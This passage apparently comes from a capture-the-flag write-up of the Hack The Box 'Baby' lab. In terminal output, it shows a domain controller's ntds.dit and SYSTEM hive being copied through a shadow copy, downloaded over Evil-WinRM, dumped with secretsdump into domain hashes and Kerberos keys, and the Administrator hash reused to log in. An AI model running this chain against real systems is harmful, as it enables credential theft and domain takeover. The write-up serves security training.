*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> diskshadow.exe /s C:\Users\Caroline.Robinson\AppData\Local\Temp\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 9/19/2025 3:28:54 AM
-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {a423bade-6a97-4a48-882e-1ca7312f498f} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {7a62d230-0941-4238-8904-5fed8646ecab} set as environment variable.
Querying all shadow copies with the shadow copy set ID {7a62d230-0941-4238-8904-5fed8646ecab}
* Shadow copy ID = {a423bade-6a97-4a48-882e-1ca7312f498f} %temp%
- Shadow copy set: {7a62d230-0941-4238-8904-5fed8646ecab} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 9/19/2025 3:28:54 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {a423bade-6a97-4a48-882e-1ca7312f498f}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> robocopy /B Z:\Windows\NTDS . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Friday, September 19, 2025 3:29:44 AM
Source : Z:\Windows\NTDS\
Dest : C:\Users\Caroline.Robinson\AppData\Local\Temp\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 Z:\Windows\NTDS\
New File 16.0 m ntds.dit
0.0%
0.3%
0.7%
1.1%
...........
99.2%
99.6%
100%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 16.00 m 16.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 153,919,412 Bytes/sec.
Speed : 8,807.340 MegaBytes/min.
Ended : Friday, September 19, 2025 3:29:44 AM
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> reg save hklm\system C:\SYSTEM
The operation completed successfully.
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> dir
Directory: C:\Users\Caroline.Robinson\AppData\Local\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/19/2025 3:28 AM 610 2025-09-19_3-28-54_BABYDC.cab
-a---- 9/19/2025 3:24 AM 510 Dis2C4D.tmp
-a---- 9/19/2025 3:26 AM 1356 Dis3D2C.tmp
-a---- 9/19/2025 3:28 AM 2294 Dis6A0E.tmp
-a---- 9/19/2025 3:28 AM 86 diskshadow.txt
-a---- 9/19/2025 3:28 AM 1176 Manifest.xml
-a---- 9/19/2025 3:16 AM 16777216 ntds.dit
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> download ntds.dit
Info: Downloading C:\Users\Caroline.Robinson\AppData\Local\Temp\ntds.dit to ntds.dit
Info: Download successful!
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> download system
Info: Downloading C:\Users\Caroline.Robinson\AppData\Local\Temp\system to system
Error: Download failed. Check filenames or paths
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> download c:/system
Info: Downloading c:/system to system
Info: Download successful!
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp>
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ impacket-secretsdump -system system -ntds ntds.dit LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
baby.vl\Jacqueline.Barnett:1104:aad3b435b51404eeaad3b435b51404ee:20b8853f7aa61297bfbc5ed2ab34aed8:::
baby.vl\Ashley.Webb:1105:aad3b435b51404eeaad3b435b51404ee:02e8841e1a2c6c0fa1f0becac4161f89:::
baby.vl\Hugh.George:1106:aad3b435b51404eeaad3b435b51404ee:f0082574cc663783afdbc8f35b6da3a1:::
baby.vl\Leonard.Dyer:1107:aad3b435b51404eeaad3b435b51404ee:b3b2f9c6640566d13bf25ac448f560d2:::
baby.vl\Ian.Walker:1108:aad3b435b51404eeaad3b435b51404ee:0e440fd30bebc2c524eaaed6b17bcd5c:::
baby.vl\Connor.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:e125345993f6258861fb184f1a8522c9:::
baby.vl\Joseph.Hughes:1112:aad3b435b51404eeaad3b435b51404ee:31f12d52063773769e2ea5723e78f17f:::
baby.vl\Kerry.Wilson:1113:aad3b435b51404eeaad3b435b51404ee:181154d0dbea8cc061731803e601d1e4:::
baby.vl\Teresa.Bell:1114:aad3b435b51404eeaad3b435b51404ee:7735283d187b758f45c0565e22dc20d8:::
baby.vl\Caroline.Robinson:1115:aad3b435b51404eeaad3b435b51404ee:5fa67a134024d41bb4ff8bfd7da5e2b5:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:ad08cbabedff5acb70049bef721524a23375708cadefcb788704ba00926944f4
Administrator:aes128-cts-hmac-sha1-96:ac7aa518b36d5ea26de83c8d6aa6714d
Administrator:des-cbc-md5:d38cb994ae806b97
BABYDC$:aes256-cts-hmac-sha1-96:1a7d22edfaf3a8083f96a0270da971b4a42822181db117cf98c68c8f76bcf192
BABYDC$:aes128-cts-hmac-sha1-96:406b057cd3a92a9cc719f23b0821a45b
BABYDC$:des-cbc-md5:8fef68979223d645
krbtgt:aes256-cts-hmac-sha1-96:9c578fe1635da9e96eb60ad29e4e4ad90fdd471ea4dff40c0c4fce290a313d97
krbtgt:aes128-cts-hmac-sha1-96:1541c9f79887b4305064ddae9ba09e14
krbtgt:des-cbc-md5:d57383f1b3130de5
baby.vl\Jacqueline.Barnett:aes256-cts-hmac-sha1-96:851185add791f50bcdc027e0a0385eadaa68ac1ca127180a7183432f8260e084
baby.vl\Jacqueline.Barnett:aes128-cts-hmac-sha1-96:3abb8a49cf283f5b443acb239fd6f032
baby.vl\Jacqueline.Barnett:des-cbc-md5:01df1349548a206b
baby.vl\Ashley.Webb:aes256-cts-hmac-sha1-96:fc119502b9384a8aa6aff3ad659aa63bab9ebb37b87564303035357d10fa1039
baby.vl\Ashley.Webb:aes128-cts-hmac-sha1-96:81f5f99fd72fadd005a218b96bf17528
baby.vl\Ashley.Webb:des-cbc-md5:9267976186c1320e
baby.vl\Hugh.George:aes256-cts-hmac-sha1-96:0ea359386edf3512d71d3a3a2797a75db3168d8002a6929fd242eb7503f54258
baby.vl\Hugh.George:aes128-cts-hmac-sha1-96:50b966bdf7c919bfe8e85324424833dc
baby.vl\Hugh.George:des-cbc-md5:296bec86fd323b3e
baby.vl\Leonard.Dyer:aes256-cts-hmac-sha1-96:6d8fd945f9514fe7a8bbb11da8129a6e031fb504aa82ba1e053b6f51b70fdddd
baby.vl\Leonard.Dyer:aes128-cts-hmac-sha1-96:35fd9954c003efb73ded2fde9fc00d5a
baby.vl\Leonard.Dyer:des-cbc-md5:022313dce9a252c7
baby.vl\Ian.Walker:aes256-cts-hmac-sha1-96:54affe14ed4e79d9c2ba61713ef437c458f1f517794663543097ff1c2ae8a784
baby.vl\Ian.Walker:aes128-cts-hmac-sha1-96:78dbf35d77f29de5b7505ee88aef23df
baby.vl\Ian.Walker:des-cbc-md5:bcb094c2012f914c
baby.vl\Connor.Wilkinson:aes256-cts-hmac-sha1-96:55b0af76098dfe3731550e04baf1f7cb5b6da00de24c3f0908f4b2a2ea44475e
baby.vl\Connor.Wilkinson:aes128-cts-hmac-sha1-96:9d4af8203b2f9e3ecf64c1cbbcf8616b
baby.vl\Connor.Wilkinson:des-cbc-md5:fda762e362ab7ad3
baby.vl\Joseph.Hughes:aes256-cts-hmac-sha1-96:2e5f25b14f3439bfc901d37f6c9e4dba4b5aca8b7d944957651655477d440d41
baby.vl\Joseph.Hughes:aes128-cts-hmac-sha1-96:39fa92e8012f1b3f7be63c7ca9fd6723
baby.vl\Joseph.Hughes:des-cbc-md5:02f1cd9e52e0f245
baby.vl\Kerry.Wilson:aes256-cts-hmac-sha1-96:db5f7da80e369ee269cd5b0dbaea74bf7f7c4dfb3673039e9e119bd5518ea0fb
baby.vl\Kerry.Wilson:aes128-cts-hmac-sha1-96:aebbe6f21c76460feeebea188affbe01
baby.vl\Kerry.Wilson:des-cbc-md5:1f191c8c49ce07fe
baby.vl\Teresa.Bell:aes256-cts-hmac-sha1-96:8bb9cf1637d547b31993d9b0391aa9f771633c8f2ed8dd7a71f2ee5b5c58fc84
baby.vl\Teresa.Bell:aes128-cts-hmac-sha1-96:99bf021e937e1291cc0b6e4d01d96c66
baby.vl\Teresa.Bell:des-cbc-md5:4cbcdc3de6b50ee9
baby.vl\Caroline.Robinson:aes256-cts-hmac-sha1-96:6fe5d46e01d6cf9909f479fb4d7afac0bd973981dd958e730a734aa82c9e13af
baby.vl\Caroline.Robinson:aes128-cts-hmac-sha1-96:f34e6c0c8686a46eea8fd15a361601f9
baby.vl\Caroline.Robinson:des-cbc-md5:fd40190d579138df
[*] Cleaning up...
With the NTDS hash, login as the domain Administrator succeeds:
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ evil-winrm -i 10.129.64.108 -u 'administrator' -H 'ee4457ae59f1e3fbd764e33d9cef123d'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
baby\administrator S-1-5-21-1407081343-4001094062-1444647654-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BABY\Group Policy Creator Owners Group S-1-5-21-1407081343-4001094062-1444647654-520 Mandatory group, Enabled by default, Enabled group
BABY\Domain Admins Group S-1-5-21-1407081343-4001094062-1444647654-512 Mandatory group, Enabled by default, Enabled group
BABY\Schema Admins Group S-1-5-21-1407081343-4001094062-1444647654-518 Mandatory group, Enabled by default, Enabled group
BABY\Enterprise Admins Group S-1-5-21-1407081343-4001094062-1444647654-519 Mandatory group, Enabled by default, Enabled group
BABY\Denied RODC Password Replication Group Alias S-1-5-21-1407081343-4001094062-1444647654-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.